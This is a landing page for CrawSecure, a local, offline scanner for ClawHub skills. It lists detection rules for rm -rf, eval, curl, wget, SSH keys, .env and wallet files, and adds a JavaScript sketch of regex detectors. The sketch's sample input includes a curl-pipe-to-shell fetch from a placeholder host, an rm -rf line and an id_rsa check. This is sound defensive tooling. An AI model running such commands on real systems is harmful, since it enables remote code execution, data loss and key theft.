Privacy-first · Offline · Open source
OpenClaw Skills
Scan skills. Keep your code.
Detect dangerous patterns in ClawHub skills before you install them. Analysis runs entirely on your machine.
13 detection rules
.js .ts .sh file types
```bash
$ npx crawsecure ./my-skill

┌──────────────────────────────────┐
│ CrawSecure v2 · @username [FREE] │
└──────────────────────────────────┘

Target: ./my-skill

🚨 Security signals found: 3

🔴 [HIGH] Detected eval() usage → src/index.js
🟡 [MEDIUM] child_process detected → src/utils.js
🟢 [LOW] process.env access → src/config.js

Risk score: 8500 → HIGH

Scan saved → crawsecure.com/dashboard/abc123
Free · 3 / 10 scans this month
```
How it works
Three steps, zero uploads, instant results.
01
Drop files or run the CLI
Drag project files into the browser scanner, or run `npx crawsecure .` from any directory.
02
Analysis runs locally
The engine reads file contents in memory and applies 13 security rules. Nothing leaves your device.
03
Get your security report
See which rules fired, severity levels, and an overall risk score, instantly.
What we detect
13 stable rule IDs: all public, all auditable.
- `rm-rf`: Destructive rm -rf command
- `eval`: Dynamic code execution via eval()
- `exec`: Process execution via exec()
- `ssh-dir`: References .ssh directory
- `id-rsa`: References SSH private key
- `child-process`: Executes system commands
- `spawn`: Child process via spawn()
- `curl`: Network request via curl
- `wget`: File download via wget
- `dotenv`: References .env file (secrets)
- `wallet`: References wallet file
- `credentials`: References credentials file
- `process-env`: Access to environment variables
Severity levels: High risk · Medium risk · Low risk
Your code never touches our servers. Ever.
Open DevTools → Network tab while running a scan. You will see zero outbound requests during analysis. If you choose to save a scan, you'll see exactly what is sent: a handful of numbers, nothing more.
Read our privacy commitment
- Code processed entirely in memory, never written to disk
- Only aggregated numbers saved (if you choose to)
- No file names, no paths, no code snippets, ever
- Fully auditable: open source, MIT license
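As an added illustration (not CrawSecure's own code), the sketch below shows how a local, in-memory pattern scan keyed on the 13 rule IDs under "What we detect" can work, and how findings can be reduced to bare counts with no file names or paths before anything is saved. The regular expressions, the names `scanFiles` and `aggregate`, the shape of the aggregate and the sample files are all assumptions constructed for this example.

```javascript
// Illustrative patterns only: the rule IDs are from the page, every regex is an assumption.
const RULES = [
  { id: "rm-rf",         re: /\brm\s+-[a-z]*(?:rf|fr)[a-z]*\b/i },
  { id: "eval",          re: /\beval\s*\(/ },
  { id: "exec",          re: /\bexec(?:Sync)?\s*\(/ },
  { id: "ssh-dir",       re: /\.ssh\b/ },
  { id: "id-rsa",        re: /\bid_rsa\b/ },
  { id: "child-process", re: /\bchild_process\b/ },
  { id: "spawn",         re: /\bspawn(?:Sync)?\s*\(/ },
  { id: "curl",          re: /\bcurl\s/ },
  { id: "wget",          re: /\bwget\s/ },
  { id: "dotenv",        re: /(?:^|[\s'"\/])\.env\b/ }, // a ".env" file, not "process.env"
  { id: "wallet",        re: /\bwallet\b/i },
  { id: "credentials",   re: /\bcredentials\b/i },
  { id: "process-env",   re: /\bprocess\.env\b/ },
];

// files: { path: contents }, held purely in memory; nothing is read from or written to disk.
function scanFiles(files) {
  const findings = [];
  for (const [file, text] of Object.entries(files)) {
    text.split(/\r?\n/).forEach((line, i) => {
      for (const { id, re } of RULES) {
        if (re.test(line)) findings.push({ rule: id, file, line: i + 1 });
      }
    });
  }
  return findings;
}

// Reduce findings to counts only: no file names, paths or code snippets survive.
function aggregate(findings) {
  const byRule = {};
  for (const f of findings) byRule[f.rule] = (byRule[f.rule] || 0) + 1;
  return { total: findings.length, byRule };
}

// Constructed sample input (not taken from any real skill).
const SAMPLE = {
  "src/index.js": [
    'const { exec } = require("child_process");',
    "exec('curl https://example.invalid/setup.sh | sh');",
    "const m = /v(\\d+)/.exec(process.env.APP_VERSION);", // RegExp exec, still matches "exec"
  ].join("\n"),
  "install.sh": 'rm -rf "$HOME/.cache/skill"\ntest -f ~/.ssh/id_rsa\n',
};
```

Line 3 of the sample fires the `exec` pattern on a `RegExp.prototype.exec` call, which is why signals from pattern rules need a manual look before they are treated as confirmed findings.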
Ready to scan?
No account required. Sign in only when you want to save your history.